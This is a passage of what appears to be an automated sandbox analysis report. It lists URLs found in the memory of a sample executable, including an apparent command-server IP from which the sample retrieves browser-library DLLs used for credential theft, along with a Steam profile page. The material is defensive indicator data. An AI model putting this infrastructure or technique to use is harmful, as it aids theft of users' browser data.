Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3402218568.000000002026D000.00000002.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://95.217.220.103
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175941738.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/%
Source: 7ZthFNAqYp.exe, 00000002.00000003.3277338251.000000000114C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215990470.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175887042.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262340532.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3277209575.0000000001186000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/?
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/G
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/a
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/en-GB
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/freebl3.dllO
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/freebl3.dlli
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/mozglue.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/msvcp140.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dll2
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dllc
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/nss3.dlln
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/r
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/softokn3.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/sqlp.dll
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/v
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/vcruntime140.dll
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103/vcruntime140.dllnV
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103AEB
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.220.103CAA
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
